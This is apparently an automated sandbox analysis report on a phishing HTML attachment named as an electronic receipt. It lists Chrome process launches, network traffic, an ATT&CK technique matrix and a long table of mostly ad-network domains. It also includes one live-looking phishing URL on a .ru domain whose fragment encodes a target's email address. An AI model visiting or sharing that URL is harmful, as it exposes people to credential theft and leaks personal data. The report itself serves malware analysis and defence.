Source: unknownNetwork traffic detected: HTTP traffic on port 50665 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52110 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51257 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50365 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51109
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51107
Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51101
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51103
Source: unknownNetwork traffic detected: HTTP traffic on port 50731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51323 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51111
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
Source: unknownNetwork traffic detected: HTTP traffic on port 51188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51129
Source: unknownNetwork traffic detected: HTTP traffic on port 51335 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51123
Source: unknownNetwork traffic detected: HTTP traffic on port 51864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51127
Source: unknownNetwork traffic detected: HTTP traffic on port 51004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51125
Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50341 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51139
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51133
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50689 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
Source: unknownNetwork traffic detected: HTTP traffic on port 51242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51131
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51137
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51141
Source: unknownNetwork traffic detected: HTTP traffic on port 51270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51406 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51471 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52063 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51282 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50517 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51539 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50448 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51540 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51660 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50529 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51483 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51495 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51311 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51294 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51552 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50660 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50530 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51458 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51229 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51659 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51888 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50436 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50659 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
Source: unknownHTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:50028 version: TLS 1.2
Source: unknownHTTPS traffic detected: 46.228.174.117:443 -> 192.168.2.4:51942 version: TLS 1.2

System Summary

barindex
Source: Name includes: Electronic_Receipt_ATT0001.htmInitial sample: receipt
Source: classification engineClassification label: mal56.phis.evad.winHTM@106/1559@804/100
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Electronic_Receipt_ATT0001.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2216,i,962291635718744552,10165825185328870103,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=2216,i,962291635718744552,10165825185328870103,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2216,i,962291635718744552,10165825185328870103,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=2216,i,962291635718744552,10165825185328870103,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://hfj.rontishet.ru/iCaWzj6Q/#C#dHNhbGNpZG9Ac3RpbnNvbnMuY29tHTTP Parser: https://hfj.rontishet.ru/iCaWzj6Q/#C#dHNhbGNpZG9Ac3RpbnNvbnMuY29t
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
securepubads.g.doubleclick.net
142.250.185.130
truefalse
    unknown
    um.simpli.fi
    34.91.62.186
    truefalse
      unknown
      tls13.taboola.map.fastly.net
      151.101.1.44
      truefalse
        unknown
        static.nl3.vip.prod.criteo.net
        178.250.1.3
        truefalse
          unknown
          global.px.quantserve.com
          91.228.74.166
          truefalse
            unknown
            ssum.casalemedia.com
            172.64.151.101
            truefalse
              unknown
              prebid.media.net
              34.120.63.153
              truefalse
                unknown
                i.clean.gg
                34.95.69.49
                truefalse
                  unknown
                  rtb.openx.net
                  35.186.253.211
                  truefalse
                    unknown
                    1.cpm.ak-is2.net
                    103.67.200.72
                    truefalse
                      unknown
                      bttrack.com
                      192.132.33.69
                      truefalse
                        unknown
                        cdn.w55c.net
                        3.73.2.196
                        truefalse
                          unknown
                          crb.kargo.com
                          18.193.235.168
                          truefalse
                            unknown
                            dualstack.tls13.taboola.map.fastly.net
                            151.101.193.44
                            truefalse
                              unknown
                              mwzeom.zeotap.com
                              104.22.51.98
                              truefalse
                                unknown
                                ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud
                                3.75.62.37
                                truefalse
                                  unknown
                                  www.google.com
                                  142.250.185.100
                                  truefalse
                                    unknown
                                    imagsync-lhrpairbc.pubmatic.com
                                    185.64.191.214
                                    truefalse
                                      unknown
                                      sync.intentiq.com
                                      3.160.150.30
                                      truefalse
                                        unknown
                                        noa-atsv2.media.g03.yahoodns.net
                                        188.125.72.139
                                        truefalse
                                          unknown
                                          yahoo.com
                                          74.6.231.21
                                          truefalse
                                            unknown
                                            id.rlcdn.com
                                            35.244.174.68
                                            truefalse
                                              unknown
                                              match.adsrvr.org
                                              52.223.40.198
                                              truefalse
                                                unknown
                                                dsp-cookie.adfarm1.adition.com
                                                80.82.210.217
                                                truefalse
                                                  unknown
                                                  match.prod.bidr.io
                                                  52.210.237.114
                                                  truefalse
                                                    unknown
                                                    ow-lhrc.pubmnet.com
                                                    185.64.190.84
                                                    truefalse
                                                      unknown
                                                      dualstack.ioriver.map.fastly.net
                                                      199.232.211.52
                                                      truefalse
                                                        unknown
                                                        pagead-googlehosted.l.google.com
                                                        142.250.185.193
                                                        truefalse
                                                          unknown
                                                          creativecdn.com
                                                          185.184.8.90
                                                          truefalse
                                                            unknown
                                                            pugm-lhrc.pubmnet.com
                                                            185.64.190.78
                                                            truefalse
                                                              unknown
                                                              uip.semasio.net
                                                              77.243.51.122
                                                              truefalse
                                                                unknown
                                                                zeta-ssp-385516103.us-east-1.elb.amazonaws.com
                                                                3.95.52.72
                                                                truefalse
                                                                  unknown
                                                                  m.deepintent.com
                                                                  8.18.47.7
                                                                  truefalse
                                                                    unknown
                                                                    events-ssc.33across.com
                                                                    34.117.239.71
                                                                    truefalse
                                                                      unknown
                                                                      pool-eu.zagreb.iponweb.net
                                                                      35.214.174.141
                                                                      truefalse
                                                                        unknown
                                                                        nld-prebid.a-mx.net
                                                                        163.5.194.35
                                                                        truefalse
                                                                          unknown
                                                                          edge-prebid-cdn.g03.yahoodns.net
                                                                          87.248.119.252
                                                                          truefalse
                                                                            unknown
                                                                            pug-lhr-bc.pubmnet.com
                                                                            185.64.191.210
                                                                            truefalse
                                                                              unknown
                                                                              pixel-sync.sitescout.com
                                                                              34.36.216.150
                                                                              truefalse
                                                                                unknown
                                                                                sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com
                                                                                3.251.14.0
                                                                                truefalse
                                                                                  unknown
                                                                                  euw-ice.360yield.com
                                                                                  34.250.159.220
                                                                                  truefalse
                                                                                    unknown
                                                                                    warp.media.net
                                                                                    23.212.88.20
                                                                                    truefalse
                                                                                      unknown
                                                                                      ActivationEdge-activation-212358690.eu-west-1.elb.amazonaws.com
                                                                                      52.49.76.6
                                                                                      truefalse
                                                                                        unknown
                                                                                        ssum-sec.casalemedia.com
                                                                                        172.64.151.101
                                                                                        truefalse
                                                                                          unknown
                                                                                          presentation-ams1.turn.com
                                                                                          46.228.164.11
                                                                                          truefalse
                                                                                            unknown
                                                                                            hblg.media.net
                                                                                            23.212.88.20
                                                                                            truefalse
                                                                                              unknown
                                                                                              lg3.media.net
                                                                                              23.212.88.20
                                                                                              truefalse
                                                                                                unknown
                                                                                                rtb.adgrx.com
                                                                                                52.215.155.11
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  widget.us5.vip.prod.criteo.com
                                                                                                  74.119.117.16
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    am1-direct-bgp.contextweb.com
                                                                                                    208.93.169.131
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      hbx.media.net
                                                                                                      23.212.88.20
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        iad-2-sync.go.sonobi.com
                                                                                                        69.166.1.66
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          nlb-dflb-496f722d06cc67e2.elb.eu-north-1.amazonaws.com
                                                                                                          13.50.192.155
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            de.tynt.com
                                                                                                            67.202.105.34
                                                                                                            truefalse
                                                                                                              unknown
                                                                                                              k8s-kongow-generalp-f832200e79-1219784492.us-east-1.elb.amazonaws.com
                                                                                                              54.197.49.144
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                hde.tynt.com
                                                                                                                67.202.105.32
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  pixel-eu.onaudience.com
                                                                                                                  54.38.113.5
                                                                                                                  truefalse
                                                                                                                    unknown
                                                                                                                    ch-vip001.taboola.com
                                                                                                                    141.226.124.48
                                                                                                                    truefalse
                                                                                                                      unknown
                                                                                                                      cs550162656.adn.psicdn.net
                                                                                                                      152.195.53.200
                                                                                                                      truefalse
                                                                                                                        unknown
                                                                                                                        core.iprom.net
                                                                                                                        195.5.165.20
                                                                                                                        truefalse
                                                                                                                          unknown
                                                                                                                          contextual.media.net
                                                                                                                          88.221.168.23
                                                                                                                          truefalse
                                                                                                                            unknown
                                                                                                                            tsdtocl.com
                                                                                                                            151.101.1.44
                                                                                                                            truefalse
                                                                                                                              unknown
                                                                                                                              tp01.map.edgio.net
                                                                                                                              152.195.133.208
                                                                                                                              truefalse
                                                                                                                                unknown
                                                                                                                                widget.nl3.vip.prod.criteo.com
                                                                                                                                178.250.1.9
                                                                                                                                truefalse
                                                                                                                                  unknown
                                                                                                                                  spug-lhrc.pubmnet.com
                                                                                                                                  185.64.190.81
                                                                                                                                  truefalse
                                                                                                                                    unknown
                                                                                                                                    id.a-mx.com
                                                                                                                                    79.127.227.46
                                                                                                                                    truefalse
                                                                                                                                      unknown
                                                                                                                                      rtb.adentifi.com
                                                                                                                                      52.54.66.88
                                                                                                                                      truefalse
                                                                                                                                        unknown
                                                                                                                                        ad.mrtnsvr.com
                                                                                                                                        34.102.163.6
                                                                                                                                        truefalse
                                                                                                                                          unknown
                                                                                                                                          sync.srv.stackadapt.com
                                                                                                                                          54.175.124.176
                                                                                                                                          truefalse
                                                                                                                                            unknown
                                                                                                                                            am-vip001.taboola.com
                                                                                                                                            141.226.228.48
                                                                                                                                            truefalse
                                                                                                                                              unknown
                                                                                                                                              pixel.tapad.com
                                                                                                                                              34.111.113.62
                                                                                                                                              truefalse
                                                                                                                                                unknown
                                                                                                                                                rtb-csync-euw2.smartadserver.com
                                                                                                                                                91.134.110.136
                                                                                                                                                truefalse
                                                                                                                                                  unknown
                                                                                                                                                  a.nel.cloudflare.com
                                                                                                                                                  35.190.80.1
                                                                                                                                                  truefalse
                                                                                                                                                    unknown
                                                                                                                                                    pippio.com
                                                                                                                                                    107.178.254.65
                                                                                                                                                    truefalse
                                                                                                                                                      unknown
